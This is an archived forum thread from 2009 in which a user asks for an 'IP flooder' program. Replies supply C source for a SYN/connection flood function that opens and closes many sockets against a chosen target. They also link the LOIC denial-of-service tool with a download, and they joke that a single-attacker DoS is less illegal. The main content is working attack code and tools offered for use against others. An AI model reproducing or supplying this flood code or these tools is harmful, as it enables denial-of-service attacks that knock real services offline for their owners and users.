PDA

View Full Version : lookin for IP flood program



TN6969
19-02-09, 05:49
Looking for a good IP FLOODER PROGRAM THAT IS LEGIT!
please send link here thanks!

STR
19-02-09, 09:47
int __cdecl SynAttack(char *target, char *port, char *len)
{
/*if(port == NULL || len == NULL || target == NULL )
return 1;*/

unsigned short p = (unsigned short)atoi(port);

int t = atoi(len);

SOCKADDR_IN addrin;
SOCKET spSocket[FLOODSOCKETS];
IN_ADDR iaddr;

ZeroMemory(&addrin,sizeof(addrin));

addrin.sin_family = AF_INET;

addrin.sin_port = fhtons(p);

LPHOSTENT lpHostEntry = 0;

DWORD mode = 1;
int c = 0,i =0;

unsigned long IP = finet_addr(target);

if (IP==INADDR_NONE) {
hostent *pHE = fgethostbyname(target);
IP = *((unsigned long *)pHE->h_addr_list[0]);
}

unsigned long TargetIP = IP;

iaddr.s_addr = TargetIP;
addrin.sin_addr = iaddr;

while(i < t)
{

for (c=0;c<FLOODSOCKETS;c++)
{
spSocket[c] = fsocket(AF_INET, SOCK_STREAM, 0);

if (spSocket[c] == INVALID_SOCKET)
continue;

fioctlsocket(spSocket[c],FIONBIO,&mode);
}

for (c=0;c<FLOODSOCKETS;c++)
fconnect(spSocket[c], (PSOCKADDR) &addrin, sizeof(addrin));


Sleep(100);

for (c=0;c<FLOODSOCKETS;c++)
fclosesocket(spSocket[c]);

i++;
}
return 1;
}

Lemmy
31-10-09, 06:23
Low Orbit Ion Cannon (LOIC) http://insurgen.info/wiki/Low_Orbit_Ion_Cannon

http://rapidshare.com/files/256167596/Gay_Pride_Cannon.rar

Thats a dos tool, dont know if thats what you want or not? but its useful and really easy to use.

drugs
02-11-09, 07:34
Low Orbit Ion Cannon (LOIC) http://insurgen.info/wiki/Low_Orbit_Ion_Cannon

http://rapidshare.com/files/256167596/Gay_Pride_Cannon.rar

Thats a dos tool, dont know if thats what you want or not? but its useful and really easy to use.
not very good ;[

Lemmy
02-11-09, 08:18
not very good ;[

Why not?

Mike_
02-11-09, 09:23
DDOS IS ILLEGAL!

drugs
02-11-09, 06:47
Why not?
im saying the program you posted isint very effective

Lemmy
02-11-09, 08:57
well i've done some reading and apparently its pretty effective... obviously not with one person using it but if lots of people do its a decent tool.


DDOS IS ILLEGAL!

If its only one person doing it its only DOS, so maybe that isnt as illegal. ; )

Mike_
03-11-09, 05:06
If its only one person doing it its only DOS, so maybe that isnt as illegal. ; )


lol'd